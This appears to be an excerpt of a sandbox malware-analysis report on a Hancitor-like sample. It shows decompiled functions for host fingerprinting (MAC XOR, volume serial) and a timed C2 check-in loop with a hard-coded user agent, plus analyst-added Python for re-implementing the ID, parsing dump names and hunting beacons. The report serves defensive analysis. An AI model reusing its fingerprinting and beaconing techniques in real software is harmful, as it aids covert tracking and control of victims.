                                                                                                                                                    • Source File: 00000010.00000002.486300863.0000000000611000.00000020.00020000.sdmp, Offset: 00610000, based on PE: true
• Associated: 00000010.00000002.486197209.0000000000610000.00000002.00020000.sdmp
• Associated: 00000010.00000002.486399700.0000000000614000.00000002.00020000.sdmp
• Associated: 00000010.00000002.486435192.0000000000615000.00000004.00020000.sdmp
• Associated: 00000010.00000002.486512384.0000000000618000.00000002.00020000.sdmp
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: lstrcat$EnumOpenProcessProcesseslstrcpy
                                                                                                                                                    • String ID: explorer.exe
                                                                                                                                                    • API String ID: 1774016706-3187896405
                                                                                                                                                    • Opcode ID: e839d241ed37c9d0ea944d5d151d4f0e5e077a8365915abcd6766fb186695705
                                                                                                                                                    • Instruction ID: 22ba7462aa6615f85f4df30c38758caac7e2cb48afe2ac306ae76e864646d26a
                                                                                                                                                    • Opcode Fuzzy Hash: e839d241ed37c9d0ea944d5d151d4f0e5e077a8365915abcd6766fb186695705
                                                                                                                                                    • Instruction Fuzzy Hash: 7E1144B5900249ABCB14DFA8DD45EDE7BBAAB48300F048199F60997241D674DAC4CBA1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • SetConsoleCP.KERNEL32(000004E3,006A906C), ref: 006680B1
                                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(000007E9,006B0470), ref: 0066820E
                                                                                                                                                    • GetSystemDirectoryW.KERNEL32(00746AD0,000007E9), ref: 00668461
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Directory$ConsoleCurrentSystem
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1220519660-0
                                                                                                                                                    • Opcode ID: 63bcae638903886e31d9649672c06f30ab2e13c414313b4d3f3c22bb84f5091f
                                                                                                                                                    • Instruction ID: 6e54bee8c3ece6117e0bb3178c84fe1a7ec2abfbcb00727c160c67ad56152062
                                                                                                                                                    • Opcode Fuzzy Hash: 63bcae638903886e31d9649672c06f30ab2e13c414313b4d3f3c22bb84f5091f
                                                                                                                                                    • Instruction Fuzzy Hash: 96F1B0795062906FD708AB3AECE52E67FE3E797310B28615FD181873A2D6386449CF31
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 0065953E
                                                                                                                                                    • _free.LIBCMT ref: 00659577
                                                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0065957E
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: EnvironmentStrings$Free_free
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2716640707-0
                                                                                                                                                    • Opcode ID: ffcd212c54b25c86f7817b7e8bdd2f28ad37a252328711a107ccf884d8a20578
                                                                                                                                                    • Instruction ID: 7167a0f0823cf492498e4bef3a544056bde57c789ce65969d2e33123834ce96f
                                                                                                                                                    • Opcode Fuzzy Hash: ffcd212c54b25c86f7817b7e8bdd2f28ad37a252328711a107ccf884d8a20578
                                                                                                                                                    • Instruction Fuzzy Hash: 77E02B37504A20BAD35233393C49AAF095BCFC13B2F350329FC1993282BE209D0B01B5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 72%
			E00611C50(void* __eflags) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _t33;
				intOrPtr _t34;
				intOrPtr _t36;
				void* _t61;
				void* _t62;

				asm("xorps xmm0, xmm0");
				asm("movlpd [ebp-0x18], xmm0");             // zero the 64-bit accumulator held in _v28 (low DWORD) / _v24 (high DWORD)
				_v12 = 0x8000;                              // SizePointer: 32 KiB output buffer
				_t33 = E00611390(_v12); // executed         // HeapAlloc wrapper (GetProcessHeap + RtlAllocateHeap, see subcalls below)
				_t62 = _t61 + 4;
				_v16 = _t33;
				_v8 = _v16;
				_t34 = _v8;
				__imp__GetAdaptersAddresses(2, 0, 0, _t34,  &_v12); // executed  // Family = 2 = AF_INET, Flags = 0, Reserved = NULL
				_v20 = _t34;
				if(_v20 == 0) {                             // ERROR_SUCCESS
					while(_v8 != 0) {                       // walk the singly linked IP_ADAPTER_ADDRESSES list
						_t11 =  &_v36; // 0x612625
						E006114A0(_t11, 0, 8);              // memset-like (inferred): zero an 8-byte scratch buffer
						_t15 =  &_v36; // 0x612625
						E00611450(_t15, _v8 + 0x2c,  *((intOrPtr*)(_v8 + 0x34))); // memcpy-like (inferred): PhysicalAddress (+0x2c), PhysicalAddressLength (+0x34) bytes
						_t62 = _t62 + 0x18;                 // 2 x 3 cdecl arguments popped
						_t17 =  &_v36; // 0x612625
						_v28 = _v28 ^  *_t17;               // XOR low DWORD of the zero-padded MAC into the accumulator
						_v24 = _v24 ^ _v32;                 // XOR high DWORD (bytes 4..7)
						_v8 =  *((intOrPtr*)(_v8 + 8));     // Next (+0x08)
					}
				}
				E006113D0(_v16); // executed                // releases the adapter buffer (inferred from the allocation pairing)
				_t36 = E00612470(); // executed             // returns a host-specific value (not recovered in this listing)
				_v44 = _t36;
				_v40 = 0;
				return E00611400(_v44, 0x20, _v40) ^ _v28; // only the low DWORD of the MAC XOR is folded into the result; _v24 is discarded
			}

Instruction addresses (one per line of the C-code above): 0x00611c56 0x00611c59 0x00611c5e 0x00611c69 0x00611c6e 0x00611c71 0x00611c77 0x00611c7e 0x00611c88 0x00611c8e 0x00611c95 0x00611c97 0x00611ca1 0x00611ca5 0x00611cbb 0x00611cbf 0x00611cc4 0x00611cca 0x00611cd3 0x00611cd6 0x00611cdf 0x00611cdf 0x00611c97 0x00611ce8 0x00611cf0 0x00611cf7 0x00611cfa 0x00611d13

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00611390: GetProcessHeap.KERNEL32(?,00611886,00100000), ref: 0061139C
                                                                                                                                                      • Part of subcall function 00611390: RtlAllocateHeap.NTDLL(01380000,00000000,00611886,?,00611886,00100000), ref: 006113BD
                                                                                                                                                    • GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,?,00008000), ref: 00611C88
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486300863.0000000000611000.00000020.00020000.sdmp, Offset: 00610000, based on PE: true
• Associated: 00000010.00000002.486197209.0000000000610000.00000002.00020000.sdmp
• Associated: 00000010.00000002.486399700.0000000000614000.00000002.00020000.sdmp
• Associated: 00000010.00000002.486435192.0000000000615000.00000004.00020000.sdmp
• Associated: 00000010.00000002.486512384.0000000000618000.00000002.00020000.sdmp
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Heap$AdaptersAddressesAllocateProcess
                                                                                                                                                    • String ID: %&a
                                                                                                                                                    • API String ID: 2964925633-950833139
                                                                                                                                                    • Opcode ID: 1ce6167602efbce73df88afcba301ae0e0d63a0651428b68afbdd1776ef9ff42
                                                                                                                                                    • Instruction ID: 989055fdb6661d255ef3cc0a0c1169bd9616f6383ab1a3d5efd36fd9ec427f73
                                                                                                                                                    • Opcode Fuzzy Hash: 1ce6167602efbce73df88afcba301ae0e0d63a0651428b68afbdd1776ef9ff42
                                                                                                                                                    • Instruction Fuzzy Hash: 5E212BB4D00209ABDB44DBE4C982BEEFBB6BF4C304F144159EA05B7241D6746A80CB91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%
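
The adapter loop in E00611C50 is the part of the host-ID computation that an analyst can reproduce from the decompilation alone. The Python below is an added re-implementation written for this report, not code from the sample or from Joe Sandbox. It mirrors the decompiled logic exactly: each adapter's PhysicalAddress is copied into an 8-byte zeroed buffer (PhysicalAddressLength bytes), the buffer is XORed into a 64-bit accumulator, and only the low 32 bits are XORed into the final value. The identification of E006114A0/E00611450 as memset/memcpy is an inference from their arguments; the other operand of the final XOR (E00611400 applied to the result of E00612470) is not recovered in the listing and is modelled as a caller-supplied `host_hash` placeholder. The example goes slightly beyond the single case in the listing: it handles adapters that report a zero-length physical address (loopback, ISATAP/Teredo tunnels), which contribute nothing, and it makes visible that two adapters with the same MAC cancel each other out. The MAC addresses in the usage block are constructed sample input.

```python
"""Re-implementation of the adapter-MAC XOR in E00611C50 (added example).

Assumptions, labelled here and in the lead-in:
  * E006114A0(buf, 0, 8) behaves like memset and E00611450(dst, src, n) like memcpy.
  * The 32-bit IP_ADAPTER_ADDRESSES layout applies: Next at +0x08,
    PhysicalAddress[8] at +0x2c, PhysicalAddressLength at +0x34.
  * host_hash stands in for E00611400(E00612470(), 0x20, 0), which is not
    recovered in the listing.
"""
import struct
from typing import Iterable

MAX_ADAPTER_ADDRESS_LENGTH = 8  # sizeof(IP_ADAPTER_ADDRESSES.PhysicalAddress)


def parse_mac(text: str) -> bytes:
    """'00:0c:29:ab:cd:ef' or '00-0c-29-ab-cd-ef' -> raw bytes."""
    return bytes.fromhex(text.replace(":", "").replace("-", ""))


def xor_physical_addresses(addresses: Iterable[bytes]) -> int:
    """Return the 64-bit accumulator the decompiled loop leaves in _v28 (low) / _v24 (high).

    Each element of `addresses` is the raw PhysicalAddress of one adapter, already
    truncated to PhysicalAddressLength bytes (zero length for loopback/tunnel adapters).
    """
    acc_lo = acc_hi = 0
    for phys in addresses:
        buf = bytearray(MAX_ADAPTER_ADDRESS_LENGTH)   # E006114A0(&_v36, 0, 8): zero 8 bytes
        n = min(len(phys), MAX_ADAPTER_ADDRESS_LENGTH)
        buf[:n] = phys[:n]                            # E00611450(&_v36, +0x2c, *(+0x34))
        lo, hi = struct.unpack("<II", bytes(buf))      # little-endian DWORD pair
        acc_lo ^= lo                                  # _v28 ^= *(DWORD *)&_v36
        acc_hi ^= hi                                  # _v24 ^= _v32
    return acc_lo | (acc_hi << 32)


def adapter_component(addresses: Iterable[bytes], host_hash: int) -> int:
    """Final 32-bit result of E00611C50: host_hash ^ low DWORD of the MAC XOR.

    The high DWORD (_v24) is computed but never used by the return statement,
    so adapters whose MACs differ only in bytes 4..7 yield the same result.
    """
    low_dword = xor_physical_addresses(addresses) & 0xFFFFFFFF
    return (host_hash & 0xFFFFFFFF) ^ low_dword


if __name__ == "__main__":
    # Constructed sample input: two Ethernet adapters plus a loopback with no MAC.
    sample = [parse_mac("00:0c:29:ab:cd:ef"), parse_mac("00-50-56-c0-00-08"), b""]
    print(f"64-bit MAC XOR : 0x{xor_physical_addresses(sample):016x}")
    print(f"result (hash=0): 0x{adapter_component(sample, 0):08x}")
    # Two adapters sharing a MAC (e.g. teamed NICs) cancel out entirely.
    print(f"duplicate MACs : 0x{xor_physical_addresses(sample[:1] * 2):016x}")
```

Because the value depends only on MAC bytes 0..3 after the final XOR, hosts that share an OUI and adjacent addresses collide easily; treat this field as a weak correlation key when pivoting across beacons rather than a unique victim identifier.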

                                                                                                                                                    C-Code - Quality: 100%
			E006124D0() {
				void* _t1;
				void* _t2;

				if( *0x61726c == 0) {                       // global HINTERNET, opened once and cached for later WinINet calls
					_t2 = InternetOpenA("Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko", 0, 0, 0, 0); // executed
					                                          // hard-coded User-Agent; dwAccessType = 0 = INTERNET_OPEN_TYPE_PRECONFIG (system proxy settings), no proxy list, no flags.
					                                          // The string is the stock IE11 User-Agent on 64-bit Windows 7, so by itself it is not a distinctive network indicator.
					 *0x61726c = _t2;
				}
				_t1 =  *0x61726c; // 0xcc0004
				return _t1;
			}

Instruction addresses (one per line of the C-code above): 0x006124da 0x006124e9 0x006124ef 0x006124ef 0x006124f4 0x006124fa

                                                                                                                                                    APIs
                                                                                                                                                    • InternetOpenA.WININET(Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko,00000000,00000000,00000000,00000000), ref: 006124E9
                                                                                                                                                    Strings
                                                                                                                                                    • Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko, xrefs: 006124E4
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486300863.0000000000611000.00000020.00020000.sdmp, Offset: 00610000, based on PE: true
• Associated: 00000010.00000002.486197209.0000000000610000.00000002.00020000.sdmp
• Associated: 00000010.00000002.486399700.0000000000614000.00000002.00020000.sdmp
• Associated: 00000010.00000002.486435192.0000000000615000.00000004.00020000.sdmp
• Associated: 00000010.00000002.486512384.0000000000618000.00000002.00020000.sdmp
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InternetOpen
                                                                                                                                                    • String ID: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                    • API String ID: 2038078732-3333256863
                                                                                                                                                    • Opcode ID: 2d53fb27c709ed709b9d2c48dc38cd0bcee1c0f01a6e7b6f644eefec98144483
                                                                                                                                                    • Instruction ID: 9efff30e6eb5217f851d16a875a0df7bb483599ff36614cc73df547058876643
                                                                                                                                                    • Opcode Fuzzy Hash: 2d53fb27c709ed709b9d2c48dc38cd0bcee1c0f01a6e7b6f644eefec98144483
                                                                                                                                                    • Instruction Fuzzy Hash: 74D0C730A89344AAD3105745AC06BD132B69344B15F19D013BB08673D1CAF076D1CE05
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%
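The dump file names in the Memory Dump Source lists above carry the origin of each region: the 0x610000 block that the decompiled functions come from is marked "based on PE: true", and its protection and type fields say what kind of memory it was. Here is an added example (not part of the Joe Sandbox report) that decodes those names. The field layout (process id, dump pass, dump id, base address, page protection, region type, with the dump id read as decimal and the rest as hex) is an assumption about the naming scheme; the PAGE_* and MEM_* values are the documented Win32 constants.

```python
# Added example: decode Joe Sandbox ".sdmp" memory-dump file names.
# ASSUMED field layout: pid.pass.dumpid.base.protect.type.sdmp
# (dumpid decimal, everything else hex). PAGE_*/MEM_* values are Win32's.
from dataclasses import dataclass

PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS",
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
    0x80: "PAGE_EXECUTE_WRITECOPY",
}
MEM_TYPE = {
    0x20000: "MEM_PRIVATE",
    0x40000: "MEM_MAPPED",
    0x1000000: "MEM_IMAGE",
}


@dataclass(frozen=True)
class DumpRegion:
    pid: int
    dump_pass: int
    dump_id: int
    base: int
    protect: int
    mem_type: int

    @property
    def protect_name(self) -> str:
        return PAGE_PROTECT.get(self.protect & 0xFF, hex(self.protect))

    @property
    def type_name(self) -> str:
        return MEM_TYPE.get(self.mem_type, hex(self.mem_type))

    @property
    def executable(self) -> bool:
        # any of the PAGE_EXECUTE* bits
        return bool(self.protect & 0xF0)

    @property
    def suspicious(self) -> bool:
        # executable pages that are not backed by a loaded image section
        return self.executable and self.mem_type != 0x1000000


def parse_sdmp_name(name: str) -> DumpRegion:
    suffix = ".sdmp"
    if not name.endswith(suffix):
        raise ValueError(f"not a .sdmp name: {name}")
    fields = name[: -len(suffix)].split(".")
    if len(fields) != 6:
        raise ValueError(f"expected 6 dot-separated fields, got {len(fields)}: {name}")
    pid, dump_pass, dump_id, base, protect, mem_type = fields
    return DumpRegion(
        pid=int(pid, 16),
        dump_pass=int(dump_pass, 16),
        dump_id=int(dump_id, 10),
        base=int(base, 16),
        protect=int(protect, 16),
        mem_type=int(mem_type, 16),
    )


def suspicious_regions(names):
    """Regions that hold executable code outside any image mapping."""
    return [r for r in (parse_sdmp_name(n) for n in names) if r.suspicious]


# The five dump names listed for this function in the report above.
REPORT_DUMPS = [
    "00000010.00000002.486300863.0000000000611000.00000020.00020000.sdmp",
    "00000010.00000002.486197209.0000000000610000.00000002.00020000.sdmp",
    "00000010.00000002.486399700.0000000000614000.00000002.00020000.sdmp",
    "00000010.00000002.486435192.0000000000615000.00000004.00020000.sdmp",
    "00000010.00000002.486512384.0000000000618000.00000002.00020000.sdmp",
]

if __name__ == "__main__":
    for n in REPORT_DUMPS:
        r = parse_sdmp_name(n)
        flag = "  <-- executable, not image-backed" if r.suspicious else ""
        print(f"{r.base:#010x} {r.protect_name:<22} {r.type_name}{flag}")
```

Under that reading every region of the 0x610000 module is MEM_PRIVATE and the 0x611000 page is PAGE_EXECUTE_READ, which is what a payload unpacked into VirtualAlloc'd memory looks like rather than a module brought in by the image loader; it is the memory-level counterpart of the "Detected unpacking" and "Entry point lies outside standard sections" signatures at the top of the report.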

                                                                                                                                                    C-Code - Quality: 100%
			// Host fingerprint helper: returns the volume serial number of the drive that holds
			// the Windows directory, or 0 if either API call fails.
			E00612470() {
				int _v8;
				long _v12;       // receives lpVolumeSerialNumber
				char _v272;      // path buffer; GetWindowsDirectoryA is given MAX_PATH (0x104) bytes
				int _t13;
				void* _t18;      // decompiler temporary: the register the NUL write below goes through

				_v8 = GetWindowsDirectoryA( &_v272, 0x104);
				if(_v8 == 0) {
					L3:
					return 0;
				}
				// A NUL is written into the path buffer through an unresolved register.
				// GetVolumeInformationA needs a root directory (for example "C:\"), so this is
				// where the Windows directory path is cut down before the volume query; the exact
				// index is not recoverable from this decompilation.
				 *((char*)(_t18 + 0xfffffffffffffef7)) = 0;
				_t13 = GetVolumeInformationA( &_v272, 0, 0,  &_v12, 0, 0, 0, 0); // executed
				if(_t13 == 0) {
					goto L3;
				}
				return _v12;     // volume serial number
			}

                                                                                                                                                    Statement addresses (collapsed from the address column of the interactive listing): 0x0061248b, 0x00612492, 0x0061249c, 0x006124bb, 0x006124c3, 0x006124ca

                                                                                                                                                    APIs
                                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00612485
                                                                                                                                                    • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 006124BB
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486300863.0000000000611000.00000020.00020000.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                    • Associated: 00000010.00000002.486197209.0000000000610000.00000002.00020000.sdmp
                                                                                                                                                    • Associated: 00000010.00000002.486399700.0000000000614000.00000002.00020000.sdmp
                                                                                                                                                    • Associated: 00000010.00000002.486435192.0000000000615000.00000004.00020000.sdmp
                                                                                                                                                    • Associated: 00000010.00000002.486512384.0000000000618000.00000002.00020000.sdmp
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: DirectoryInformationVolumeWindows
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3487004747-0
                                                                                                                                                    • Opcode ID: 96ceaf661601ce76eba58257516cae5898120ce403ddfef8bd96e3a5585d8d7f
                                                                                                                                                    • Instruction ID: 03ca42afa3ccadd0e096aa9fd441fc2290d9511f4f06c868452793df4bbdb5af
                                                                                                                                                    • Opcode Fuzzy Hash: 96ceaf661601ce76eba58257516cae5898120ce403ddfef8bd96e3a5585d8d7f
                                                                                                                                                    • Instruction Fuzzy Hash: 3DF05430A40309AAE724DBA4DC15BE977B99705B00F1441A5A645EA1C0DBF46AD8CF94
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 82%
			// Check-in loop. Allocates two 1 MiB buffers and a 4 KiB work buffer, then repeats:
			// produce the check-in (E00611A80), walk whatever came back, and sleep twice for
			// 0xEA60 ms (60 s) before the next round. Callees without subcall APIs listed below
			// are not resolved in this excerpt, so their comments describe only what this
			// function does with their results.
			E00611870(void* __eflags) {
				intOrPtr _v8;        // 4 KiB work buffer
				long _v12;           // buffer size, 0x100000
				intOrPtr _v16;       // cursor into _v24
				intOrPtr _v20;       // 1 MiB buffer handed to E00611A80
				intOrPtr _v24;       // 1 MiB buffer passed to E00611560, then walked via _v16
				char _v28;
				intOrPtr _v32;       // loop flag, set to 1 and never changed: the loop does not exit on its own
				char _v36;
				intOrPtr _t28;
				intOrPtr _t29;
				intOrPtr _t30;
				void* _t32;
				intOrPtr _t35;
				void* _t38;
				void* _t40;
				void* _t46;          // decompiler temporaries used below but missing from the original listing
				void* _t52;
				void* _t55;
				intOrPtr _t58;

				_v12 = 0x100000;
				_t28 = E00611390(_v12); // executed  -- heap allocation (GetProcessHeap + RtlAllocateHeap, see subcall APIs)
				_v20 = _t28;
				_t29 = E00611390(_v12); // executed
				_v24 = _t29;
				_t30 = E00611390(0x1000);
				_t55 = _t52 + 0xc;                   // stack-pointer bookkeeping left in by the decompiler
				_v8 = _t30;
				_v32 = 1;
				while(1) {
					_t58 = _v32 - 1;
					if(_v32 != 1) {
						break;                       // never taken: _v32 is not modified inside the loop
					}
					// Formats a string that includes the GetVersion result (GetVersion, wsprintfA per the
					// subcall APIs) using _v20 and its size; only a return value of 1 leads to _v20 being
					// processed, anything else goes straight to the sleep.
					_t32 = E00611A80( &_v36, _t58, _v20, _v12,  &_v36); // executed
					_t55 = _t55 + 0xc;
					if(_t32 != 1) {
						L12:
						Sleep(0xea60); // executed  -- 60 000 ms
						_t30 = E006115C0();
						Sleep(0xea60); // executed  -- 60 000 ms: roughly two minutes between rounds
						continue;
					}
					_t35 = E00611560(_v20 + 4, _v24);   // processes _v20 past its first 4 bytes into _v24
					_t55 = _t55 + 8;
					_v36 = _t35;
					_v16 = _v24;
					while(1 != 0) {
						_v16 = E006117B0(_v16, _v16, _v8);   // advances the cursor; a result of 0 ends the walk
						_t38 = E00612790(_v16, _v8);
						_t55 = _t55 + 0xc;
						if(_t38 == 1) {
							_v28 = 0;
							_t46 = _v8;
							_t40 = E00611630(_v8, _v8,  &_v28);
							_t55 = _t55 + 8;
							if(_t40 == 1 && _v28 == 0) {
								E006114E0(_t46, _v8);
								_t55 = _t55 + 4;
							}
						}
						if(_v16 != 0) {
							continue;
						} else {
							goto L12;
						}
					}
					goto L12;
				}
				return _t30;
			}
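Every pass through this loop ends in two Sleep(0xEA60) calls, so the sample returns to its server about every 120 seconds (plus whatever the unresolved E006115C0 call costs), and the request side uses the literal "Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko" passed to InternetOpenA earlier on this page. The following is an added example of turning those two observations into hunt logic; it is not code from the report or from the sample. The proxy log format, hosts and addresses are constructed, and the 120 s period and 15 s tolerance are assumptions drawn from the two Sleep calls.

```python
# Added example (not from the report): flag hosts that contact one destination on a
# near-fixed cadence with the user agent the sample passes to InternetOpenA.
# The 120 s period follows from the two Sleep(0xEA60) calls per loop iteration;
# the log format and all addresses/hostnames below are constructed.
from collections import defaultdict
from datetime import datetime
from statistics import median

HANCITOR_UA = "Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko"
EXPECTED_PERIOD_S = 120.0   # 2 x 60 000 ms of Sleep per iteration
TOLERANCE_S = 15.0          # slack for the unresolved E006115C0 call and network jitter
MIN_INTERVALS = 3           # need at least four requests before calling it a beacon

# Constructed proxy log: "timestamp|source|destination|user-agent", one request per line.
SAMPLE_LOG = "\n".join([
    f"2021-07-08T10:00:00|10.1.1.5|c2.invalid|{HANCITOR_UA}",
    f"2021-07-08T10:02:03|10.1.1.5|c2.invalid|{HANCITOR_UA}",
    f"2021-07-08T10:04:05|10.1.1.5|c2.invalid|{HANCITOR_UA}",
    f"2021-07-08T10:06:07|10.1.1.5|c2.invalid|{HANCITOR_UA}",
    # a real IE11 user browsing: same UA, irregular timing
    f"2021-07-08T10:00:11|10.1.1.7|news.example|{HANCITOR_UA}",
    f"2021-07-08T10:00:40|10.1.1.7|news.example|{HANCITOR_UA}",
    f"2021-07-08T10:05:02|10.1.1.7|news.example|{HANCITOR_UA}",
    f"2021-07-08T10:09:20|10.1.1.7|news.example|{HANCITOR_UA}",
    # a monitoring agent: periodic, but a different UA
    "2021-07-08T10:00:00|10.1.1.9|monitor.example|agent/1.0",
    "2021-07-08T10:02:00|10.1.1.9|monitor.example|agent/1.0",
    "2021-07-08T10:04:00|10.1.1.9|monitor.example|agent/1.0",
    "2021-07-08T10:06:00|10.1.1.9|monitor.example|agent/1.0",
])


def parse_log(text):
    """Return (timestamp, src, dst, ua) tuples; blank lines are ignored."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, ua = line.split("|", 3)
        records.append((datetime.fromisoformat(ts), src, dst, ua))
    return records


def periodic_groups(records, period=EXPECTED_PERIOD_S, tol=TOLERANCE_S, min_intervals=MIN_INTERVALS):
    """(src, dst, ua) -> median gap in seconds, for groups whose every gap is within tol of period."""
    by_key = defaultdict(list)
    for ts, src, dst, ua in records:
        by_key[(src, dst, ua)].append(ts)
    hits = {}
    for key, stamps in by_key.items():
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        if len(gaps) >= min_intervals and all(abs(g - period) <= tol for g in gaps):
            hits[key] = median(gaps)
    return hits


def find_beacons(records, ua=HANCITOR_UA, **kwargs):
    """Periodic groups narrowed to the hard-coded user agent: the combination is the signal."""
    return {k: v for k, v in periodic_groups(records, **kwargs).items() if k[2] == ua}


if __name__ == "__main__":
    for (src, dst, _), gap in find_beacons(parse_log(SAMPLE_LOG)).items():
        print(f"{src} -> {dst}: request every ~{gap:.0f} s with the hard-coded IE11 user agent")
```

The user agent on its own is a weak signal: "Windows NT 6.1 ... Trident/7.0; rv:11.0" is the stock Internet Explorer 11 string on Windows 7, which is why the browsing host in the sample log is not flagged. What the sample does is pass that literal regardless of the real OS, so on a fleet with no Windows 7 or IE11 left the string alone becomes worth a look, and paired with a fixed cadence to a single destination it is a usable hunt. The monitoring agent in the sample is periodic too but carries a different user agent, so periodic_groups() lists it while find_beacons() does not.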
                                                                                                                                                    Statement addresses (collapsed from the address column of the interactive listing): 0x00611876, 0x00611881, 0x00611889, 0x00611890, 0x00611898, 0x006118a0, 0x006118a5, 0x006118a8, 0x006118ab, 0x006118b2, 0x006118b6, 0x006118c8, 0x006118cd, 0x006118d3, 0x006118e4, 0x006118e9, 0x006118ec, 0x006118f2, 0x006118f5, 0x0061190e, 0x00611915, 0x0061191a, 0x00611920, 0x00611922, 0x0061192d, 0x00611931, 0x00611936, 0x0061193c, 0x00611948, 0x0061194d, 0x00611954, 0x00611956, 0x0061195a, 0x0061195f, 0x00611965, 0x0061196f, 0x0061197d

APIs
  • Part of subcall function 00611390: GetProcessHeap.KERNEL32(?,00611886,00100000), ref: 0061139C
  • Part of subcall function 00611390: RtlAllocateHeap.NTDLL(01380000,00000000,00611886,?,00611886,00100000), ref: 006113BD
  • Part of subcall function 00611A80: GetVersion.KERNEL32(?,006118CD,?,00100000,?), ref: 00611A8D
  • Part of subcall function 00611A80: wsprintfA.USER32 ref: 00611B3E
• Sleep.KERNELBASE(0000EA60), ref: 0061195F
• Sleep.KERNELBASE(0000EA60), ref: 0061196F
Memory Dump Source
• Source File: 00000010.00000002.486300863.0000000000611000.00000020.00020000.sdmp, Offset: 00610000, based on PE: true
• Associated: 00000010.00000002.486197209.0000000000610000.00000002.00020000.sdmp
• Associated: 00000010.00000002.486399700.0000000000614000.00000002.00020000.sdmp
• Associated: 00000010.00000002.486435192.0000000000615000.00000004.00020000.sdmp
• Associated: 00000010.00000002.486512384.0000000000618000.00000002.00020000.sdmp
Yara matches
Similarity
• API ID: HeapSleep$AllocateProcessVersionwsprintf
• String ID:
• API String ID: 1739176888-0
• Opcode ID: 9daa3e4bc12d506931837538422eea4f2bbfd43363ae36e9e6d85b3ac3f68a15
• Instruction ID: c2d583be903a656a6d2326b5574b8e5466d0c3fd469828b1f1183dad9fa83291
• Opcode Fuzzy Hash: 9daa3e4bc12d506931837538422eea4f2bbfd43363ae36e9e6d85b3ac3f68a15
• Instruction Fuzzy Hash: 9531E5F5D002099BCF50DBD0D851AEEB77AAF0A305F188419E219BB341E7359A84CB96
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00650D67: RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 00650DA8
• _free.LIBCMT ref: 0065A05D
Memory Dump Source
• Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
Similarity
• API ID: AllocateHeap_free
• String ID:
• API String ID: 614378929-0
• Opcode ID: 149e36dedd55b9eb0563fd4c3a0b4f1dcc4d21c8996fabd591b521a4ca3340f8
• Instruction ID: 3a1207b41c6d4676123a8ae0c4fad37925fe2e4b1c9c342888080dfd4c6091e1
• Opcode Fuzzy Hash: 149e36dedd55b9eb0563fd4c3a0b4f1dcc4d21c8996fabd591b521a4ca3340f8
• Instruction Fuzzy Hash: 9F014972600356ABC3308F98D8819DAFBD9EB05375F10032DE945B76C0E370AC04C7A4
Uniqueness

Uniqueness Score: -1.00%

APIs
• RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 00650DA8
Memory Dump Source
• Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
